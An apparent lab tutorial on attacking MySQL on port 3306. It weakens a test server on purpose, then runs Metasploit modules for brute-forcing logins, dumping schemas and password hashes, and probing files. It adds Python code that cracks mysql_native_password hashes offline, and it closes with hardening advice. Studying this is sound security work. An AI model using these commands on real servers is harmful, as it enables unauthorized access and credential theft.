Penetration Testing on MySQL (Port 3306)
In this article, we will first make a MySQL server deliberately reachable and weakly configured, run the common attacks against it on port 3306, and then look at how to secure it. To protect a service on a port you need to understand what an attacker can do with it: if you do not know what can be exploited and how, you will not know what to lock down.
Table of Content
- Introduction to MySQL-Server
- Installation of MySQL-Server
- Pen testing MySQL-Server
Introduction to MySQL-Server
MySQL Server is the core of MySQL: it stores the databases and executes the SQL statements sent to it. It is available both as a standalone daemon (mysqld) for the usual client/server deployment and as an embeddable library that can be linked into other applications, and it ships with a set of utility programs for administering databases. Statements reach the server through a MySQL client, such as the mysql command-line tool installed on the administrator's machine. By default the server listens on TCP port 3306.
Installation of MySQL-Server
The first step is to install the MySQL server package:
apt install mysql-server
Then confirm that the server is up and listening on its TCP port:
netstat -tnl
Pentesting MySQL-Server
Scanning MySQL & Connecting to MySQL
As the netstat output shows, the MySQL server is running. But if you scan the port from another machine, nmap reports it as closed:
nmap -p3306 192.168.1.108
The port is not really closed. By default MySQL binds only to the loopback address, so the socket is listening on 127.0.0.1:3306 and cannot be reached from any other host; a scan run on the server itself against 127.0.0.1 would show it open, as in the image below. This comes from the bind-address = 127.0.0.1 line in the MySQL configuration file. To expose the service, open that file:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
and comment out the bind-address line by putting a '#' in front of it, as shown in the image below. With no bind-address set, mysqld listens on all interfaces once the service has been restarted.
Now if you scan the port again, it shows as open:
nmap -p3306 192.168.1.108
But if you try to log in through this port from the remote host, you get an access-denied error. MySQL keys privileges on both user and host, and the root account only exists as root@localhost, so the server refuses it from any other address.
To allow this, log in to the MySQL server locally and run the following statements, which create a root account valid from any host ('%') with the password 123 and give it every privilege. This is exactly the insecure state we want for the exercises that follow: a superuser reachable from anywhere with a trivial password. (On MySQL 8.0 the IDENTIFIED BY clause is no longer accepted in GRANT; create the account with CREATE USER first and then run the GRANT without it.)
GRANT ALL PRIVILEGES ON *.* TO root@'%' IDENTIFIED BY '123';
FLUSH PRIVILEGES;
Now, when you try to log in, you will succeed, as shown in the image below:
Let's scan the port again with version detection to grab as many details as we can, such as the service banner. The MySQL version string is sent by the server in its greeting before any authentication takes place, so it is visible to anyone who can reach the port:
nmap -sV -p3306 192.168.1.108
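What nmap -sV actually reads here is the MySQL initial handshake packet, which the server sends to every client before any authentication. The following added example (not code from the original article or from nmap) decodes that greeting into the fields a scanner cares about: the version string, the connection id, the 20-byte salt, the capability flags (including whether TLS is offered) and the authentication plugin. The sample packet is constructed by build_handshake() with an assumed version string and salt; it is not captured from a real server.

```python
"""Decode a MySQL initial handshake (protocol v10) the way a version scan does."""
import struct

# Capability bits from the MySQL client/server protocol (subset)
CLIENT_SSL = 0x00000800                 # server offers TLS
CLIENT_SECURE_CONNECTION = 0x00008000   # 4.1-style challenge/response auth
CLIENT_PLUGIN_AUTH = 0x00080000         # auth plugin name follows


def build_handshake(version: bytes, conn_id: int, salt: bytes, caps: int,
                    plugin: bytes = b"mysql_native_password") -> bytes:
    """Encode a v10 greeting. Used here only to construct sample input."""
    if len(salt) != 20:
        raise ValueError("salt must be 20 bytes")
    p = b"\x0a" + version + b"\x00" + struct.pack("<I", conn_id)
    p += salt[:8] + b"\x00"                     # auth-plugin-data part 1 + filler
    p += struct.pack("<H", caps & 0xFFFF)       # lower capability bits
    p += b"\x21"                                # character set (utf8_general_ci)
    p += struct.pack("<H", 0x0002)              # status flags (autocommit)
    p += struct.pack("<H", caps >> 16)          # upper capability bits
    p += bytes([len(salt) + 1]) if caps & CLIENT_PLUGIN_AUTH else b"\x00"
    p += b"\x00" * 10                           # reserved
    if caps & CLIENT_SECURE_CONNECTION:
        p += salt[8:] + b"\x00"                 # part 2 (12 bytes) + NUL
    if caps & CLIENT_PLUGIN_AUTH:
        p += plugin + b"\x00"
    return len(p).to_bytes(3, "little") + b"\x00" + p   # 3-byte length, seq id 0


def parse_handshake(packet: bytes) -> dict:
    """Decode the greeting. Raises ValueError on anything that is not a v10 greeting."""
    length = int.from_bytes(packet[:3], "little")
    seq = packet[3]
    payload = packet[4:4 + length]
    if seq != 0 or len(payload) != length:
        raise ValueError("truncated packet or unexpected sequence id")
    if payload[0] != 0x0A:
        # A server that rejects the client host answers with an ERR packet (0xFF) instead.
        raise ValueError("not a v10 handshake (first byte 0x%02x)" % payload[0])
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode("ascii", "replace")
    pos = end + 1
    conn_id = struct.unpack_from("<I", payload, pos)[0]
    pos += 4
    salt = payload[pos:pos + 8]
    pos += 8 + 1                                # skip filler byte
    caps = struct.unpack_from("<H", payload, pos)[0]
    pos += 2
    charset = payload[pos]
    status = struct.unpack_from("<H", payload, pos + 1)[0]
    caps |= struct.unpack_from("<H", payload, pos + 3)[0] << 16
    pos += 5
    auth_len = payload[pos]
    pos += 1 + 10                               # auth data length + reserved bytes
    if caps & CLIENT_SECURE_CONNECTION:
        n = max(13, auth_len - 8)
        salt += payload[pos:pos + n - 1]        # drop the terminating NUL
        pos += n
    plugin = None
    if caps & CLIENT_PLUGIN_AUTH:
        plugin = payload[pos:payload.index(b"\x00", pos)].decode("ascii", "replace")
    return {"server_version": version, "connection_id": conn_id, "salt": salt,
            "capabilities": caps, "charset": charset, "status": status,
            "ssl": bool(caps & CLIENT_SSL), "auth_plugin": plugin}


def risk_notes(h: dict) -> list:
    """What the unauthenticated greeting already tells an attacker."""
    notes = []
    if not h["ssl"]:
        notes.append("no TLS offered: queries and results cross the wire in the clear")
    if h["auth_plugin"] == "mysql_native_password":
        notes.append("mysql_native_password: stored hashes are unsalted SHA1(SHA1(pw)), fast to crack offline")
    return notes


# Constructed sample, not a capture: assumed 5.7 Ubuntu build, no TLS, native auth.
SAMPLE_PACKET = build_handshake(b"5.7.29-0ubuntu0.18.04.1", 7, bytes(range(1, 21)),
                                CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)

if __name__ == "__main__":
    info = parse_handshake(SAMPLE_PACKET)
    print(info["server_version"], info["auth_plugin"], "tls" if info["ssl"] else "no-tls")
    for note in risk_notes(info):
        print(" -", note)
```

The point for the defender is that everything the parser prints is leaked before a single credential is sent, so hiding the version or moving the port gains little; the actionable items are whether CLIENT_SSL is set and which auth plugin is in use.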
MySQL Brute-Force Attack
The port can also be brute-forced with Metasploit. The mysql_login module tries every user/password combination from the supplied word lists against the MySQL instance. Start msfconsole in Kali and run the following commands to begin the attack:
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.108
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit
Running SQL queries without logging into MySQL
The mysql_sql module executes a single SQL statement against the instance using the supplied credentials; here it lists the databases:
use auxiliary/admin/mysql/mysql_sql
set rhosts 192.168.1.108
set username root
set password 123
set sql show databases
exploit
Extracting the MySQL schema dump
The mysql_schemadump module pulls the schema information (databases, tables and columns) from the server:
use auxiliary/scanner/mysql/mysql_schemadump
set rhosts 192.168.1.108
set username root
set password 123
exploit
Extracting login hashes from the MySQL server
The mysql_hashdump module extracts the usernames and password hashes from the mysql.user table and stores them as loot for later offline cracking:
use auxiliary/scanner/mysql/mysql_hashdump
set rhosts 192.168.1.108
set username root
set password 123
exploit
When the module finishes, the result is in the loot file it creates, as shown in the image below:
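The two modules above are two sides of the same scheme. For a mysql_native_password account the server stores '*' followed by the hex of SHA1(SHA1(password)); at login it sends a 20-byte salt and the client answers with SHA1(password) XOR SHA1(salt + SHA1(SHA1(password))), which the server can verify using only the stored hash. Because the stored hash is unsalted, a dumped hash can be cracked with one pass over a wordlist. The following added example (not code from the original article or from Metasploit) implements the client response, the server-side check and an offline cracker for user:hash lines; the dump lines and wordlist are constructed here, not loot from a real target.

```python
"""mysql_native_password: the login scramble and offline cracking of dumped hashes."""
import hashlib


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def mysql_native_hash(password: str) -> str:
    """Value stored in mysql.user for this password: '*' + hex(SHA1(SHA1(pw))), upper case."""
    return "*" + sha1(sha1(password.encode())).hex().upper()


def scramble_response(password: str, salt: bytes) -> bytes:
    """The 20-byte answer a client (or mysql_login) sends for one login attempt."""
    stage1 = sha1(password.encode())
    stage2 = sha1(stage1)
    mask = sha1(salt + stage2)
    return bytes(a ^ b for a, b in zip(stage1, mask))


def server_verify(stored_hash: str, salt: bytes, response: bytes) -> bool:
    """Server side: unmask stage1 from the response and check SHA1(stage1) == stored value."""
    stage2 = bytes.fromhex(stored_hash[1:])
    mask = sha1(salt + stage2)
    stage1 = bytes(a ^ b for a, b in zip(response, mask))
    return sha1(stage1) == stage2


def crack_dump(dump_text: str, wordlist) -> tuple:
    """Crack user:hash lines against a wordlist.

    Returns (found, skipped): found maps user -> password ('' means the account
    has no password at all), skipped lists users whose hash is not a
    mysql_native_password hash (for example caching_sha2_password, '$A$...').
    One hash is computed per candidate and matched against every account.
    """
    targets, found, skipped = {}, {}, []
    for line in dump_text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, h = line.split(":", 1)
        h = h.strip().upper()
        if h == "":
            found[user] = ""                 # empty authentication_string: no password
        elif h.startswith("*") and len(h) == 41:
            targets.setdefault(h, []).append(user)
        else:
            skipped.append(user)
    for word in wordlist:
        for user in targets.get(mysql_native_hash(word), ()):
            found[user] = word
    return found, skipped


# Constructed sample dump in user:hash form; the hashes are generated here.
SAMPLE_DUMP = "\n".join([
    "root:" + mysql_native_hash("123"),
    "app:" + mysql_native_hash("s3cret"),
    "backup:" + mysql_native_hash("N0tInTheList!"),
    "guest:",                                        # account with no password
    "svc:$A$005$constructedplaceholder",             # caching_sha2_password, not crackable here
])
WORDLIST = ["password", "123", "admin", "s3cret"]    # constructed

if __name__ == "__main__":
    salt = bytes(range(20))                          # constructed; a real server sends a random one
    print("stored hash for '123':", mysql_native_hash("123"))
    print("login with '123' accepted:", server_verify(mysql_native_hash("123"), salt,
                                                      scramble_response("123", salt)))
    found, skipped = crack_dump(SAMPLE_DUMP, WORDLIST)
    print("cracked:", found, "skipped:", skipped)
```

Note that each guess costs two SHA1 calls and no per-account salt is involved, which is why a hashdump result is so much cheaper to crack than to brute-force online with mysql_login; it is also the reason to migrate accounts to caching_sha2_password, which crack_dump correctly refuses to handle.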
Checking Writable Directories
Another attack against the MySQL port is to enumerate directories the server can write to. By default this does not work, because the secure_file_priv setting restricts where mysqld may read and write files (the Ubuntu packages point it at a dedicated directory). If the administrator has loosened that setting as follows, an attacker with a database account can use the server to drop files anywhere the mysql OS user can write. Open the configuration file:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then add the following line at the end of the file (it belongs under the [mysqld] section) and restart the service:
secure_file_priv=""
Now the mysql_writable_dirs module can enumerate writable directories using the SELECT ... INTO DUMPFILE feature. It does so by writing a test file into each directory from dir_list, so expect leftover files on the target:
use auxiliary/scanner/mysql/mysql_writable_dirs
set rhosts 192.168.1.108
set username root
set password 123
set dir_list /root/dir.txt
exploit
Enumerating Files
To go further, the mysql_file_enum module enumerates files and directories using the MySQL load_file feature. It needs an account with the FILE privilege (our root@'%' has it) and is subject to the same secure_file_priv restriction:
use auxiliary/scanner/mysql/mysql_file_enum
set rhosts 192.168.1.108
set username root
set password 123
set file_list /root/dir.txt
exploit
Changing the Port
Finally, the listening port can be changed. This is sometimes done to reduce noise from automated scanners, but it is obscurity rather than security: a version scan of the new port still identifies MySQL, and none of the attacks above depend on the port number. To change it, open the configuration file:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then change the port line to the port you want; here we use 4033. Restart the service afterwards.
When you scan the new port with version detection, nmap reports the MySQL service running there instead of on the default port.
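The walkthrough changes three settings in mysqld.cnf (bind-address commented out, secure_file_priv emptied, port moved), and only one of them is a hardening step. The following added example (not code from the original article) reads the [mysqld] section of such a file and reports each setting that leaves the server exposed, treating a non-default port as informational rather than as a control. Both configuration fragments are constructed here to mirror the weak state built above and its hardened counterpart.

```python
"""Audit the mysqld.cnf settings changed in this walkthrough."""
import re

DEFAULT_PORT = "3306"
WILDCARD_BINDS = {"0.0.0.0", "*", "::"}

# Constructed: the exposed state built above (bind-address commented out,
# secure_file_priv emptied, port moved to 4033).
WEAK_CNF = """
[mysqld]
user            = mysql
pid-file        = /var/run/mysqld/mysqld.pid
socket          = /var/run/mysqld/mysqld.sock
port            = 4033
datadir         = /var/lib/mysql
# bind-address  = 127.0.0.1
secure_file_priv=""
"""

# Constructed: the reverse of every change above.
HARDENED_CNF = """
[mysqld]
user            = mysql
socket          = /var/run/mysqld/mysqld.sock
datadir         = /var/lib/mysql
bind-address    = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
"""


def parse_mysqld_section(text: str) -> dict:
    """Return option -> value for the [mysqld] section.

    Comments ('#' or ';') are stripped, so a commented-out bind-address is
    simply absent. Dashes are folded to underscores because mysqld accepts
    both spellings. Bare options (no '=') are stored as True.
    """
    section, settings = None, {}
    for raw in text.splitlines():
        line = re.split(r"[#;]", raw, 1)[0].strip()
        if not line:
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            section = m.group(1).strip().lower()
            continue
        if section != "mysqld":
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip().lower().replace("-", "_")] = value.strip().strip('"').strip("'")
        else:
            settings[line.lower().replace("-", "_")] = True
    return settings


def audit(text: str) -> list:
    """Findings for the three settings this walkthrough touches."""
    s = parse_mysqld_section(text)
    findings = []
    bind = s.get("bind_address")
    if s.get("skip_networking") is True:
        pass                                   # TCP disabled entirely: nothing to reach
    elif bind is None or bind in WILDCARD_BINDS:
        findings.append("bind-address: listening on all interfaces (commented out or wildcard); "
                        "set 127.0.0.1 or one internal interface")
    sfp = s.get("secure_file_priv")
    if sfp == "":
        findings.append("secure_file_priv is empty: LOAD_FILE and SELECT ... INTO DUMPFILE "
                        "can reach any path the mysql user can")
    elif sfp is None:
        findings.append("secure_file_priv not set explicitly: confirm the build default with "
                        "SHOW VARIABLES LIKE 'secure_file_priv' and pin it to a dedicated directory")
    port = s.get("port")
    if port and port != DEFAULT_PORT:
        findings.append(f"port {port}: non-default, but not a control; a version scan still "
                        "identifies MySQL on it")
    return findings


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(name, audit(cnf) or ["no findings"])
```

The hardened fragment is what "securing" the server in this article amounts to, together with dropping the root@'%' account created earlier; the audit deliberately reports the moved port as a note so that nobody reads it as a fix.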
That is how to expose, exploit and then secure a MySQL server. Securing it means undoing the changes made above: keep bind-address on 127.0.0.1 or a single internal interface, drop the root@'%' account and give applications their own least-privilege users with strong passwords, keep secure_file_priv pointing at a dedicated directory, and treat a changed port as a convenience rather than a control.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
Need help for pen testing.
Hi, Raj.
I can’t leave my password blank.
I pressed ENTER, and no response.
Can you help me, please?
Thank you.
Andriel,
I think you should not give “-p” in the mysql command if there’s no password. So your command should be: mysql -h hostname -u username
Excellent article, I was able to perform some of the exercises. Thanks again!
I have tried the MySQL brute force attack with the correct RHOSTS, USER_FILE and PASS_FILE, but when I run it Metasploit says: unsupported version of mysql detected. skipping.
Now what?
You will have to specify the target with `set target [target id]`, You can see the available targets by `show targets`. If you are brute-forcing passwords of the MySQL server, using hydra is much quicker.
very good exploit thank you so much